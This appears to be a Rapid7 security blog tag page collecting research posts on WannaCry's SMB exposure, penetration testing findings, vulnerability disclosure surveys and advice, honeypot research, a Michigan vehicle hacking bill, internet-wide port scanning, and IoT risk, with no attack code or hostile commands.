Skip navigation
All Places > Information Security > Blog > Tags research
1 2 3 Previous Next

Information Security

759 Posts tagged with the research tag

WannaCry Overview

Last week the WannaCry ransomware worm, also known as Wanna Decryptor, Wanna Decryptor 2.0, WNCRY, and WannaCrypt started spreading around the world, holding computers for ransom at hospitals, government offices, and businesses. To recap: WannaCry exploits a vulnerability in the Windows Server Message Block (SMB) file sharing protocol. It spreads to unpatched devices directly connected to the internet and, once inside an organization, those machines and devices behind the firewall as well. For full details, check out the blog post: Wanna Decryptor (WannaCry) Ransomware Explained.

 

Since last Friday morning (May 12), there have been several other interesting posts about WannaCry from around the security community. Microsoft provided specific guidance to customers on protecting themselves from WannaCry. MalwareTech wrote about how registering a specific domain name triggered a kill switch in the malware, stopping it from spreading. Recorded Future provided a very detailed analysis of the malware’s code.

 

However, the majority of reporting about WannaCry in the general news has been that while MalwareTech’s domain registration has helped slow the spread of WannaCry, a new version that avoids that kill switch will be released soon (or is already here) and that this massive cyberattack will continue unabated as people return to work this week.

 

In order to understand these claims and monitor what has been happening with WannaCry, we have used data collected by Project Sonar and Project Heisenberg to measure the population of SMB hosts directly connected to the internet, and to learn about how devices are scanning for SMB hosts.

 

Part 1: In which Rapid7 uses Sonar to measure the internet

Project Sonar regularly scans the internet on a variety of TCP and UDP ports; the data collected by those scans is available for you to download and analyze at scans.io. WannaCry exploits a vulnerability in devices running Windows with SMB enabled, which typically listens on port 445. Using our most recent Sonar scan data for port 445 and the recog fingerprinting system, we have been able to measure the deployment of SMB servers on the internet, differentiating between those running Samba (the Linux implementation of the SMB protocol) and actual Windows devices running vulnerable versions of SMB.

 

We find that there are over 1 million internet-connected devices that expose SMB on port 445. Of those, over 800,000 run Windows, and — given that these are nodes running on the internet exposing SMB — it is likely that a large percentage of these are vulnerable versions of Windows with SMBv1 still enabled (other researchers estimate up to 30% of these systems are confirmed vulnerable, but that number could be higher).

 

We can look at the geographic distribution of these hosts using the following treemap (ISO3C labels provided where legible):

fig1.png[ Figure 1 ]

 

The United States, Asia, and Europe have large pockets of Windows systems directly exposed to the internet while others have managed to be less exposed (even when compared to their overall IPv4 blocks allocation).

 

We can also look at the various versions of Windows on these hosts:

fig2.png[ Figure 2 ]

 

The vast majority of these are server-based Windows operating systems, but there is also a further unhealthy mix of Windows desktop operating systems in the mix—, some quite old. The operating system version levels also run the gamut of the Windows release history timeline:

fig3.png[ Figure 3 ]

 

Using Sonar, we can get a sense for what is out there on the internet offering SMB services. Some of these devices are researchers running honeypots (like us), and some of these devices are other research tools, but a vast majority represent actual devices configured to run SMB on the public internet. We can see them with our light-touch Sonar scanning, and other researchers with more invasive scanning techniques have been able to positively identify that infection rates are hovering around 2%.

 

Part 2: In which Rapid7 uses Heisenberg to listen to the internet

While Project Sonar scans the internet to learn about what is out there, Project Heisenberg is almost the inverse: it listens to the internet to learn about scanning activity. Since SMB typically runs on port 445, and the WannaCry malware scans port 445 for potential targets, if we look at incoming connection attempts on port 445 to Heisenberg nodes as shown in Figure 4, we can see that scanning activity spiked briefly on 2017-05-10 and 2017-05-11, then increased quite a bit on 2017-05-12, and has stayed at elevated levels since.

 

incoming-connections.png[Figure 4]

 

Not all traffic to Heisenberg on port 445 is an attempt to exploit the SMB vulnerability that WannaCry targets (MS17-010). There is always scanning traffic on port 445 (just look at the activity from 2017-05-01 through 2017-05-09), but a majority of the traffic captured between 2017-05-12 and 2017-05-14 was attempting to exploit MS17-010 and likely came from devices infected with the WannaCry malware. To determine this we matched the raw packets captured by Heisenberg on port 445 against sample packets known to exploit MS17-010.

 

Figure 5 shows the number of unique IP addresses scanning for port 445, grouped by hour between 2017-05-10 and 2017-05-16. The black line shows that at the same time that the number of incoming connections increases (2017-05-12 through 2017-05-14), the number of unique IPs addresses scanning for port 445 also increases. Furthermore, the orange line shows the number of new, never- before- seen IPs scanning for port 445. From this we can see that a majority of the IPs scanning for port 445 between 2017-05-12 and 2017-05-14 were new scanners.

 

unique-source-ips.png[ Figure 5 ]

 

Finally, we see scanning activity from 157 different countries in the month of May, and scanning activity from 133 countries between 2017-05-12 and 2017-05-14. Figure 6 shows the top 20 countries from which we have seen scanning activity, ordered by the number of unique IPs from those countries.

 

ips-by-country.png[ Figure 6 ]

 

While we have seen the volume of scans on port 445 increase compared to historical levels, it appears that the surge in scanning activity seen between 2017-05-12 and 2017-05-14 has started to tail off.

 

So what?

Using data collected by Project Sonar we have been able to measure the deployment of vulnerable devices across the internet, and we can see that there are many of them out there. Using data collected by project Heisenberg, we have seen that while scanning for devices that expose port 445 has been observed for quite some time, the volume of scans on port 445 has increased since 2017-05-12, and a majority of those scans are specifically looking to exploit MS17-010, the SMB vulnerability that the WannaCry malware looks to exploit.

 

MS17-010 will continue to be a vector used by attackers, whether from the WannaCry malware or from something else. Please, follow Microsoft’s advice and patch your systems. If you are a Rapid7 InsightVM or Nexpose customer, or you are running a free 30 day trial, here is a step by step guide on on how you can scan your network to find all of your assets that are potentially at risk for your organization.

 

Coming Soon

If this sort of information about internet wide measurements and analysis is interesting to you, stay tuned for the National Exposure Index 2017. Last year, we used Sonar scans to evaluate the security exposure of all the countries of the world based on the services they exposed on the internet. This year, we have run our studies again, we have improved our methodology and infrastructure, and we have new findings to share.

 

Related:

Today, we're excited to release Rapid7's latest research paper, Under the Hoodie: Actionable Research from Penetration Testing Engagements, by Bob Rudis, Andrew Whitaker, Tod Beardsley, with loads of input and help from the entire Rapid7 pentesting team.

 

This paper covers the often occult art of penetration testing, and seeks to demystify the process, techniques, and tools that pentesters use to break into enterprise networks. By drawing on the experiences of dozens of pentesters in the field, based on real, qualified data drawn from the real-life experiences of those pentesters, we're able to suss out the most common vulnerabilities that are exploited, the most common network misconfigurations that are leveraged, and the most effective methods we've found to compromise high-value credentials.

 

Finding: Detection is Everything

Probably the most actionable finding we discovered is that most organizations that conduct penetration testing exercises have a severe lack of usable, reliable intrusion detection capabilities. Over two-thirds of our pentesters completely avoided detection during the engagement. This is especially concerning given that most assessments don't put a premium on stealth; due to constraints in time and scope, pentesters generate an enormous amount of malicious traffic. In an ideal network, these would be setting off alarm bells everywhere. Most engagements end with recommendations to implement some kind of incident detection and response, regardless of the specific techniques for compromise were used.

Finding: Enterprise Size and Industry Doesn't Matter

When we started this study, we expected to find quantitative differences between small networks and large networks, and between different industries. After all, you might expect a large, financial industry enterprise of over 1,000 employees would be better equipped to detect and defend against unwelcome attackers due to the security resources available and required by various compliance regimes and regulatory requirements. Or, you might believe that a small, online-only retail startup would be more nimble and more familiar with the threats facing their business.

 

Alas, this isn't the case. As it turns out, the detection and prevention rates are nearly identical between large and small enterprises, and no industry seemed to fare any better or worse when it came to successful compromises.

 

This is almost certainly due to the fact that IT infrastructure pretty much everywhere is built using the same software and hardware components. Thus, all networks tend to be vulnerable to the same common misconfigurations that have the same vulnerability profiles when patch management isn't firing at 100%. There are certainly differences in the details -- especially when it comes to custom-designed web applications -- but even those tend to have the same sorts of frameworks and components that power them.

 

The Human Touch

Finally, if you're not really into reading a bunch of stats and graphs, we have a number of "Under the Hoodie" sidebar stories, pulled from real-life engagements. For example, while discussing common web application vulnerabilities, we're able to share a story of how a number of otherwise lowish-severity, external web application issues lead to the eventual compromise of the entire internal back-end network. Not only are these stories fun to read, they do a pretty great job of illustrating how unrelated issues can conspire on an attacker's behalf to lead to surprising levels of unauthorized access.

 

I hope you take a moment to download the paper and take a look at our findings; I don't know of any other research out there that explores the nuts and bolts of penetration testing in quite the depth or breadth that this report provides. In addition, we'll be covering the material at our booth at the RSA security conference next week in San Francisco, as well as hosting a number of "Ask a Pentester" sessions. Andrew and I will both be there, and we love nothing more than connecting with people who are interested in Rapid7's research efforts, so definitely stop by.

When cybersecurity researchers find a bug in product software, what’s the best way for the researchers to disclose the bug to the maker of that software? How should the software vendor receive and respond to researchers’ disclosure? Questions like these are becoming increasingly important as more software-enabled goods - and the cybersecurity vulnerabilities they carry - enter the marketplace. But more data is needed on how these issues are being dealt with in practice.

 

Today we helped publish a research report [PDF] that investigates attitudes and approaches to vulnerability disclosure and handling. The report is the result of two surveys – one for security researchers, and one for technology providers and operators – launched as part of a National Telecommunications and Information Administration (NTIA) “multistakeholder process” on vulnerability disclosure. The process split into three working groups: one focused on building norms/best practices for multi-party complex disclosure scenarios; one focused on building best practices and guidance for disclosure relating to “cyber safety” issues, and one focused on driving awareness and adoption of vulnerability disclosure and handling best practices. It is this last group, the “Awareness and Adoption Working Group” that devised and issued the surveys in order to understand what researchers and technology providers are doing on this topic today, and why. Rapid7 - along with several other companies, organizations, and individuals - participated in the project (in full disclosure, I am co-chair of the working group) as part of our ongoing focus on supporting security research and promoting collaboration between the security community and technology manufacturers.

 

The surveys, issued in April, investigated the reality around awareness and adoption of vulnerability disclosure best practices. I blogged at the time about why the surveys were important: in a nutshell, while the topic of vulnerability disclosure is not new, adoption of recommended practices is still seen as relatively low. The relationship between researchers and technology providers/operators is often characterized as adversarial, with friction arising from a lack of mutual understanding. The surveys were designed to uncover whether these perceptions are exaggerated, outdated, or truly indicative of what’s really happening. In the latter instance, we wanted to understand the needs or concerns driving behavior.

 

The survey questions focused on past or current behavior for reporting or responding to cybersecurity vulnerabilities, and processes that worked or could be improved. One quick note – our research efforts were somewhat imperfect because, as my data scientist friend Bob Rudis is fond of telling me, we effectively surveyed the internet (sorry Bob!). This was really the only pragmatic option open to us; however, it did result in a certain amount of selection bias in who took the surveys. We made a great deal of effort to promote the surveys as far and wide as possible, particularly through vertical sector alliances and information sharing groups, but we expect respondents have likely dealt with vulnerability disclosure in some way in the past. Nonetheless, we believe the data is valuable, and we’re pleased with the number and quality of responses.

 

There were 285 responses to the vendor survey and 414 to the researcher survey. View the infographic here [PDF].

 

Key findings

Researcher survey

ntia-aag-2016-survey-infographic-block-2.png

  • The vast majority of researchers (92%) generally engage in some form of coordinated vulnerability disclosure.
  • When they have gone a different route (e.g., public disclosure) it has generally been because of frustrated expectations, mostly around communication.
  • The threat of legal action was cited by 60% of researchers as a reason they might not work with a vendor to disclose.
  • Only 15% of researchers expected a bounty in return for disclosure, but 70% expected regular communication about the bug.

 

Vendor survey

  • Vendor responses were generally separable into “more mature” and “less mature” categories. Most of the more mature vendors (between 60 and 80%) used all the processes described in the survey.
  • Most “more mature” technology providers and operators (76%) look internally to develop vulnerability handling procedures, with smaller proportions looking at their peers or at international standards for guidance.
  • More mature vendors reported that a sense of corporate responsibility or the desires of their customers were the reasons they had a disclosure policy.
  • Only one in three surveyed companies considered and/or required suppliers to have their own vulnerability handling procedures.

 

Building on the data for a brighter future

With the rise of the Internet of Things we are seeing unprecedented levels of complexity and connectivity for technology, introducing cybersecurity risk in all sorts of new areas of our lives. Adopting robust mechanisms for identifying and reporting vulnerabilities, and building productive models for collaboration between researchers and technology providers/operators has never been so critical.

 

It is our hope that this data can help guide future efforts to increase awareness and adoption of recommended disclosure and handling practices. We have already seen some very significant evolutions in the vulnerability disclosure landscape – for example, the DMCA exemption for security research; the FDA post-market guidance; and proposed vulnerability disclosure guidance from NHTSA. Additionally, in the past year, we have seen notable names in defense, aviation, automotive, and medical device manufacturing and operating all launch high profile vulnerability disclosure and handling programs. These steps are indicative of an increased level of awareness and appreciation of the value of vulnerability disclosure, and each paves the way for yet more widespread adoption of best practices.

 

The survey data itself offers a hopeful message in this regard - many of the respondents indicated that they clearly understand and appreciate the benefits of a coordinated approach to vulnerability disclosure and handling. Importantly, both researchers and more mature technology providers indicated a willingness to invest time and resources into collaborating so they can create more positive outcomes for technology consumers.

 

Yet, there is still a way to go. The data also indicates that to some extent, there are still perception and communication challenges between researchers and technology providers/operators, the most worrying of which is that 60% of researchers indicated concern over legal threats. Responding to these challenges, the report advises that:

 

“Efforts to improve communication between researchers and vendors should encourage more coordinated, rather than straight-to-public, disclosure. Removing legal barriers, whether through changes in law or clear vulnerability handling policies that indemnify researchers, can also help. Both mature and less mature companies should be urged to look at external standards, such as ISOs, and further explanation of the cost-savings across the software development lifecycle from implementation of vulnerability handling processes may help to do so.”

 

The bottom line is that more work needs to be done to drive continued adoption of vulnerability disclosure and handling best practices. If you are an advocate of coordinated disclosure – great! – keep spreading the word. If you have not previously considered it, now is the perfect time to start investigating it. ISO 29147 is a great starting point, or take a look at some of the example policies such as the Department of Defense or Johnson and Johnson. If you have questions, feel free to post them here in the comments or contact community [at] rapid7 [dot] com.

 

As a final thought, I would like to thank everyone that provided input and feedback on the surveys and the resulting data analysis - there were a lot of you and many of you were very generous with your time. And I would also like to thank everyone that filled in the surveys - thank you for lending us a little insight into your experiences and expectations.

 

~ @infosecjen

Introducing Project Heisenberg Cloud

Project Heisenberg Cloud is a Rapid7 Labs research project with a singular purpose: understand what attackers, researchers and organizations are doing in, across and against cloud environments. This research is based on data collected from a new, Rapid7-developed honeypot framework called Heisenberg along with internet reconnaissance data from Rapid7's Project Sonar.

 

Internet-scale reconnaissance with cloud-inspired automation

Heisenberg honeypots are a modern take on the seminal attacker detection tool. Each Heisenberg node is a lightweight, highly configurable agent that is centrally deployed using well-tested tools, such as terraform, and controlled from a central administration portal. Virtually any honeypot code can be deployed to Heisenberg agents and all agents send back full packet captures for post-interaction analysis.

 

One of the main goals of Heisenberg it to understand attacker methodology. All interaction and packet capture data is synchronized to a central collector and all real-time logs are fed directly into Rapid7's Logentries for live monitoring and historical data mining.

 

Insights into cloud configs and attacker methodology

Rapid7 and Microsoft deployed multiple Heisenberg honeypots in every "zone" of six major cloud providers: Amazon, Azure, Digital Ocean, Rackspace, Google and Softlayer, and examined the service diversity in each of these environments, the type of connection attackers, researchers and organizations are initiating within, against and across these environments.

 

To paint a picture of the services offered in each cloud provider, the research teams used Sonar data collected during Rapid7's 2016 National Exposure study. Some highlights include:

 

  • The six cloud providers in our study make up nearly 15% of available IPv4 addresses on the internet.
  • 22% of Softlayer nodes expose database services (MySQL & SQL Server) directly to the internet.
  • Web services are prolific, with 53-80 of nodes in each provider exposing some type of web service.
  • Digital Ocean and Google nodes expose shell (Telnet & SSH) services at a much higher rate - 86% and 74%, respectively - than the other four cloud providers in this study.
  • A wide range of attacks were detected, including ShellShock, SQL Injection, PHP webshell injection and credentials attacks against ssh, Telnet and remote framebuffer (e.g. VNC, RDP & Citrix).
  • Our honeypots caught "data mashup" businesses attempting to use the cloud to mask illegal content scraping activity.

 

Read More

For more detail on our initial findings with Heisenberg Cloud, please click here to download our report or here for slides from our recent UNITED conference presentation.

 

Acknowledgements

We would like to thank Microsoft and Amazon for engaging with us through the initial stages of this research effort, and as indicated above, we hope they, and other cloud hosting providers will continue to do so as we move forward with the project.

This is a guest post from Art Manion, Technical Manager of the Vulnerability Analysis Team at the CERT Coordination Center (CERT/CC). CERT/CC is part of the Software Engineering Institute at Carnegie Mellon University.

 

October is National Cyber Security Awareness month and Rapid7 is taking this time to celebrate security research. This year, NCSAM coincides with new legal protections for security research under the DMCA and the 30th anniversary of the CFAA - a problematic law that hinders beneficial security research. Throughout the month, we will be sharing content that enhances understanding of what independent security research is, how it benefits the digital ecosystem, and the challenges that researchers face.

 

The CERT/CC has been doing coordinated vulnerability disclosure (CVD) since 1988. From the position of coordinator, we see the good, bad, and ugly from vendors, security researchers and other stakeholders involved in CVD. In this post, I'm eventually going to give some advice to security researchers. But first, some background discussion about sociotechnical systems, the internet of things, and chilling effects.

 

While there are obvious technological aspects of the creation, discovery, and defense of vulnerabilities, I think of cybersecurity and CVD as sociotechnical systems. Measurable improvements will depend as much on effective social institutions ("stable, valued, recurring patterns of [human] behavior") as they will on technological advances. The basic CVD process itself -- discover, report, wait, publish -- is an institution concerned with socially optimal [PDF] protective behavior. This means humans making decisions, individually and in groups, with different information, incentives, beliefs, and norms. Varying opinions about "optimal" explain why, despite three decades of debate and both offensive and defensive technological advances, vulnerability disclosure remains a controversial topic.

 

To add further complication, the rapid expansion of the internet of things has changed the dynamics of CVD and cybersecurity in general. Too many "things" have been designed with the same disregard to security associated with internet-connected systems of the 1980s, combined with the real potential to cause physical harm. The Mirai botnet, which set DDoS bandwidth records in 2016, used an order of magnitude fewer username and password guesses than the Morris worm did in 1988. Remote control attacks on cars and implantable medical devices have been demonstrated. The stakes involved in software security and CVD are no longer limited to theft of credit cards, account credentials, personal information, and trade or national secrets.

 

In pursuit of socially optimal CVD and with consideration for the new dynamics of IoT, I've become involved in two policy areas: defending beneficial security research and defining CVD process maturity. These two areas intersect when researchers chose CVD as part of their work, and that choice is not without risk to the researcher.

 

The security research community has valid and serious concerns about the chilling effects, real and perceived, of legal barriers and other disincentives [PDF] to performing research and disclosing results. On the other hand, there is a public policy desire to differentiate legitimate and beneficial security research from criminal activity. The confluence of these two forces leads to the following conundrum: If rules for security researchers are codified -- even with broad agreement from researchers, whose opinions differ -- any research activity that falls out of bounds could be considered unethical or even criminal.

 

Codified rules could reduce they grey area created by "exceeds authorized access" and the steady supply of new vulnerabilities (often discovered by accessing things in interesting and unexpected ways). But with CVD, and most complex interactions, the exception is the rule and CVD is full of grey. Honest mistakes, competing interests, language, time zone, and cultural barriers, disagreements and other forms of miscommunication are commonplace. There's still too little information and too many moving parts to codify CVD rules in fair and effective way.

 

Nonetheless, I see value in improving the quality of vulnerability reports and CVD as an institution, so here is some guidance for security researchers who choose the CVD option. Most of this advice is based on my experience at the CERT/CC for the last 15 years, which is bound to include some personal opinion, so caveat lector.

 

  • Be aware. In three decades of debate, a lot has been written about vulnerability disclosure. Read up, talk to your peers. If you're subject to U.S. law and read only one reference, it should be the EFF's Coders' Rights Project Vulnerability Reporting FAQ.

 

  • Be humble. Your vulnerability is not likely the most important out of 14,000+ public disclosures this year. Please think carefully before registering a domain for your vulnerability. You might fully understand the system you're researching, or you might not, particularly if the system has significant, non-traditional-compute context, like implantable medical devices.

 

  • Be confident. If your vulnerability is legit, then you'll be able to demonstrate it, and others will be able to reproduce. You're also allowed to develop your reputation and brand, just not at a disproportionate cost to others.

 

  • Be responsible. CVD is full of externalities. Admit when you're wrong, make clarifications and corrections.

 

  • Be concise. A long, rambling report or advisory costs readers time and mental effort and is usually an indication of a weak or invalid report. If you've got a real vulnerability, demonstrate it clearly and concisely.

 

  • PoC||GTFO. This one goes hand in hand with being concise. Actual PoC may not be necessary, but provide clear evidence of the vulnerable behavior you're reporting and steps for others to reproduce. Videos might help, but they don't cut it by themselves.

 

  • Be clear. Both with your intentions and your communications. You won't reach agreement with everyone, particularly about when to publish, but try to avoid surprises. Use ISO 8601 date/time formats. Simple phrasing, avoid idiom.

 

  • Be professional. Professionals balance humility, confidence, candor, and caution. Professionals don't need to brag. Professionals get results. Let your work speak for itself, don't exaggerate.

 

  • Be empathetic. Vendors and the others you're dealing with have their own perspectives and constraints. Take some extra care with those who are new to CVD.

 

  • Minimize harm. Public disclosure is harmful. It increases risk to affected users (in the short term at least) and costs vendors and defenders time and money. The theory behind CVD is that in the long run, public disclosure is universally better than no disclosure. I'm not generally a fan of analogies in cybersecurity, but harm reduction in public health is one I find useful (informed by, but different than this take). If your research reveals sensitive information, stop at the earliest point of proving the vulnerability, don't share the information, and don't keep it. Use dummy accounts when possible.

 

In a society increasingly dependent on complex systems, security research is important work, and the behavior of researchers matters. At the CERT/CC, much of our CVD effort is focused on helping others build capability and improving institutions, thus, the advice above. We do offer a public CVD service, so if you've reached an impasse, we may be able to help.

 

Art Manion is the Technical Manager of the Vulnerability Analysis team in the CERT Coordination Center (CERT/CC), part of the Software Engineering Institute at Carnegie Mellon University. He has studied vulnerabilities and coordinated responsible disclosure efforts since joining CERT in 2001. After gaining mild notoriety for saying "Don't use Internet Explorer" in a conference presentation, Manion now focuses on policy, advocacy, and rational tinkering approaches to software security, including standards development in ISO/IEC JTC 1 SC 27 Security techniques. Follow Art at @zmanion and CERT at @CERT_Division.

Yesterday, the Michigan Senate Judiciary Committee passed a bill – S.B. 0927 – that forbids some forms of vehicle hacking, but includes specific protections for cybersecurity researchers. Rapid7 supports these protections. The bill is not law yet – it has only cleared a Committee in the Senate, but it looks poised to keep advancing in the state legislature. Our background and analysis of the bill is below.

 

In summary:

  • The amended bill offers legal protections for independent research and repair of vehicle computers. These protections do not exist in current Michigan state law.
  • The amended bill bans some forms of vehicle hacking that damage property or people, but we believe this was already largely prohibited under current Michigan state law.
  • The bill attempts to make penalties for hacking more proportional, but this may not be effective.

 

Background

 

Earlier this year, Michigan state Senator Mike Kowall introduced S.B. 0927 to prohibit accessing a motor vehicle's electronic system without authorization. The bill would have punished violations with a potential life sentence. As noted by press reports at the time, the bill's broad language made no distinction between malicious actors, researchers, or harmless access. The original bill is available here.

 

After S.B. 0927 was introduced, Rapid7 worked with a coalition of cybersecurity researchers and companies to detail concerns that the bill would chill legitimate research. We argued that motorists are safer as a result of independent research efforts that are not necessarily authorized by vehicle manufacturers. For example, in Jul. 2015, researchers found serious security flaws in Jeep software, prompting a recall of 1.4 million vehicles. Blocking independent research to uncover vehicle software flaws would undermine cybersecurity and put motorists at greater risk.

 

Over a four-month period, Rapid7 worked rather extensively with Sen. Kowall's office and Michigan state executive agencies to minimize the bill's damage to cybersecurity research. We applaud their willingness to consider our concerns and suggestions. The amended bill passed by the Michigan Senate Judiciary Committee, we believe, will help provide researchers with greater legal certainty to independently evaluate and improve vehicle cybersecurity in Michigan.

 

The Researcher Protections

 

First, let's examine the bill's protections for researchers – Sec. 5(2)(B); pg. 6, lines 16-21. Explicit protection for cybersecurity researchers does not currently exist in Michigan state law, so we view this provision as a significant step forward.

 

This provision says researchers do not violate the bill's ban on vehicle hacking if the purpose is to test, refine, or improve the vehicle – and not to damage critical infrastructure, other property, or injure other people. The research must also be performed under safe and controlled conditions. A court would need to interpret what qualifies as "safe and controlled" conditions – hacking a moving vehicle on a highway probably would not qualify, but we would argue that working in one's own garage likely sufficiently limits the risks to other people and property.

 

The researcher protections do not depend on authorization from the vehicle manufacturer, dealer, or owner. However, because of the inherent safety risks of vehicles, Rapid7 would support a well-crafted requirement that research beyond passive signals monitoring must obtain authorization from the vehicle owner (as distinct from the manufacturer).

 

The bill offers similar protections for licensed manufacturers, dealers, and mechanics [Sec. 5(2)(A); pg. 6, lines 10-15]. However, both current state law and the bill would not explicitly give vehicle owners (who are not mechanics, or are not conducting research) the right to access their own vehicle computers without manufacturer authorization. However, since Michigan state law does not clearly give owners this ability, the bill is not a step back here. Nonetheless, we would prefer the legislation make clear that it is not a crime for owners to independently access their own vehicle and device software.

 

The Vehicle Hacking Ban

 

The amended bill would explicitly prohibit unauthorized access to motor vehicle electronic systems to alter or use vehicle computers, but only if the purpose was to damage the vehicle, injure persons, or damage other property [Sec. 5(1)(c)-(d); pgs. 5-6, lines 23-8]. That is an important limit that should exclude, for example, passive observation of public vehicle signals or attempts to fix (as opposed to damage) a vehicle.

 

Although the amended bill would introduce a new ban on certain types of vehicle hacking, our take is that this was already illegal under existing Michigan state law. Current Michigan law – at MCL 752.795 – prohibits unauthorized access to "a computer program, computer, computer system, or computer network." The current state definition of "computer" – at MCL 752.792 – is already sweeping enough to encompass vehicle computers and communications systems. Since the law already prohibits unauthorized hacking of vehicle computers, it's difficult to see why this legislation is actually necessary. Although the bill’s definition of "motor vehicle electronic system" is too broad [Sec. 2(11); pgs. 3-4, lines 25-3], its redundancy with current state law makes this legislation less of an expansion than if there were no overlap.

 

Penalty Changes

 

The amended bill attempts to create some balance to sentencing under Michigan state computer crime law [Sec. 7(2)(A); pg. 8, line 11]. This provision essentially makes harmless violations of Sec. 5 (which includes the general ban on hacking, including vehicles) a misdemeanor, as opposed to a felony. Current state law – at MCL 752.797(2) – makes all Sec. 5 violations felonies, which is potentially harsh for innocuous offenses. We believe that penalties for unauthorized hacking should be proportionate to the crime, so building additional balance in the law is welcome.

 

However, this provision is limited and contradictory. The Sec. 7 provision applies only to those who "did not, and did not intend to," acquire/alter/use a computer or data, and if the violation can be "cured without injury or damage." But to violate Sec. 5, the person must have intentionally accessed a computer to acquire/alter/use a computer or data. So the person did not violate Sec. 5 in the first place if the person did not do those things or did not do them intentionally. It’s unclear under what scenario Sec. 7 would kick in and provide a more proportionate sentence – but at least this provision does not appear to cause any harm. We hope this provision can be strengthened and clarified as the bill moves through the Michigan state legislature.

 

Conclusion

 

On balance, we think the amended bill is a major improvement on the original, though not perfect. The most important improvements we'd like to see are

  1. Clarifying the penalty limitation in Sec. 7; 
  2. Narrowing the definition of "motor vehicle electrical system" in Sec. 2; and
  3. Limiting criminal liability for owners that access software on vehicle computers they own.

 

However, the clear protections for independent researchers are quite helpful, and Rapid7 supports them. To us, the researcher protections further demonstrate that lawmakers are recognizing the benefits of independent research to advance safety, security, and innovation. The attempt at creating proportional sentences is also sorely needed and welcome, if inelegantly executed.

 

The amended bill is at a relatively early stage in the legislative process. It must still pass through the Michigan Senate and House. Nonetheless, it starts off on much more positive footing than it did originally. We intend to track the bill as it moves through the Michigan legislature and hope to see it improve further. In the meantime, we'd welcome feedback from the community.

Today, I'm happy to announce the latest research paper from Rapid7, National Exposure Index: Inferring Internet Security Posture by Country through Port Scanning, by Bob Rudis, Jon Hart, and me, Tod Beardsley. This research takes a look at one of the most foundational components of the internet: the millions and millions of individual services that live on the public IP network. thumbnail_National Exposure Index_cover.jpg

 

When people think about "the internet," they tend to think only of the one or two protocols that the World Wide Web runs on, HTTP and HTTPS. Of course, there are loads of other services, but which are actually in use, and at what rate? How much telnet, SSH, FTP, SMTP, or any of the other protocols that run on TCP/IP is actually in use today, where are they all located, and how much of it is inherently insecure due to running over non-encrypted, cleartext channels?

 

While projects like CAIDA and Shodan perform ongoing telemetry that covers important aspects of the internet, we here at Rapid7 are unaware of any ongoing effort to gauge the general deployment of services on public networks. So, we built our own, using Project Sonar, and we have the tooling now to not only answer these fundamental questions about the nature of the internet and come up with more precise questions for specific lines of inquiry.

 

Can you name the top ten TCP protocols offered on the internet? You probably can guess the top two, but did you know that #7 is telnet? Yep, there are 15 million good old, reliable, usually unencrypted telnet out there, offering shells to anyone who cares to peek in on the cleartext password as it's being used.

 

We found some weird things on the national level, too. For instance, about 75% of the servers offering SMB/CIFS services - a (usually) Microsoft service for file sharing and remote administration for Windows machines -  reside in just six countries: the United States, China, Hong Kong, Belgium, Australia and Poland.

 

It's facts like these that made us realize that we have a fundamental gap in our awareness of the services deployed on the public side of firewalls the world over. This gap, in turn, makes it hard to truly understand what the internet is. So, the paper and the associated data we collected (and will continue to collect) can help us all get an understanding of what makes up one of the most significant technologies in use on Planet Earth.


So, you can score a copy of the paper, full of exciting graphs (and absolutely zero pie charts!) here. Or, if you're of a mind to dig into the data behind those graphs, you can score the summary data here and let us know what is lurking in there that you found surprising, shocking, or sobering.

Recently I transitioned from a Principal Consultant role into a new role at Rapid7, as Research Lead with a focus on IoT technology, and it has been a fascinating challenge. Although I have been conducting research for a number of years, covering everything from Format string and Buffer overflow research on Windows applications to exploring embedded appliance and hacking multifunction printers (MFP), conducting research within the IoT world is truly exciting and amazing and has taught me to be even more open minded.

 

That is, open minded to the fact that there are people out there attaching technology to everything and anything. (Even toothbrushes.)

 

oralb-bluetooth.png

 

As a security consultant, over the last eight years I have focused most of my research on operational style attacks, which I have developed and used to compromise systems and data during penetration testing. The concept of operational attacks is the process of using the operational features of a device against itself.

 

As an example, if you know how to ask nicely, MFPs will often give up Active Directory credentials, or as recent research has disclosed, network management systems openly consume SNMP data without questioning its content or where it came from.

 

IoT research is even cooler because now I get the chance to expand my experience into a number of new avenues. Historically I have prided myself in the ability to define risk around my research and communicate it well. With IoT, I initially shuddered at the question: “How do I define Risk?"

 

IoT Risk

In the past, it has been fairly simple to define and explain risk as it relates to operational style attacks within an enterprise environment, but with IoT technology I initially struggled with the concept of risk. This was mainly driven by the fact that most IoT technologies appear to be consumer-grade products. So if someone hacks my toothbrush they may learn how often I brush my teeth. What is the risk there, and how do I measure that risk?

 

The truth is, the deeper I head down this rabbit hole called IoT, the better my understanding of risk grows. A prime example of defining such risk was pointed out by Tod Beardsley in his blog “The Business Impact of Hacked Baby Monitors”. On the first look, we might easily jump to the conclusion that there may not be any serious risk to an enterprise business. But on second take, if a malicious actor can use some innocuous IoT technology to gain a foothold to the home network of one of your employees, they could then potentially pivot onto the corporate network via remote access, such a VPN. This is a valid risk that can be communicated and should be seriously considered.

 

IoT Research

To better define risk, we need to ensure our research involves all aspect of IoT technology. Often when researching and testing IoT, researchers can get a form of tunnel vision where they focus on the technology from a single point of reference, as an example, the device itself.

 

While working and discussing IoT technology with my peers at Rapid7, I have grown to appreciate the complexity of IoT and its ecosystem. Yes, ecosystem—this is where we consider the entire security picture of IoT, and not just one facet of the technology. This includes the three following categories and how each one of these categories interacts and impacts each of the other categories. We cannot test one without the other and consider that testing effective.  We must test each one and also test how they affect each other.

 

ecosystem.png

 

With IoT quickly becoming more than just consumer-grade products, we are starting to see more IoT-based technologies migrating into the enterprise environment. If we are ever going to build a secure IoT world, it is critical during our research that all aspects of the ecosystem are addressed.

 

The knowledge we learn from this research can help enterprises better cope with the new security risk, make better decisions on technology purchases, and help employees stay safe within their home environment—which leads to better security for our enterprises. Thorough research can also deliver valuable knowledge back to the vendors, making it possible to improve product security during the design, creation, and manufacturing of IoT technology, so new vendors and new products are not recreating the same issues over and over.

 

So, as we continue down the road of IoT research, let us focus our efforts on the entire ecosystem. That way we can assure that our efforts lead to a complete picture and culminate in security improvements within the IoT industry.

by Suchin Gururangan & Bob Rudis

 

At Rapid7, we are committed to engaging in research to help defenders understand, detect and defeat attackers. We conduct internet-scale research to gain insight into the volatile threat landscape and share data with the community via initiatives like Project Sonar1 and Heisenberg2. As we crunch this data, we have a better idea of the global exposure to common vulnerabilities and can see emerging patterns in offensive attacks.

 

We also use this data to add intelligence to our products and services. We’re developing machine learning models that use this daily internet telemetry to identify phishing sites and find+classify devices through their certificate and site configurations.

 

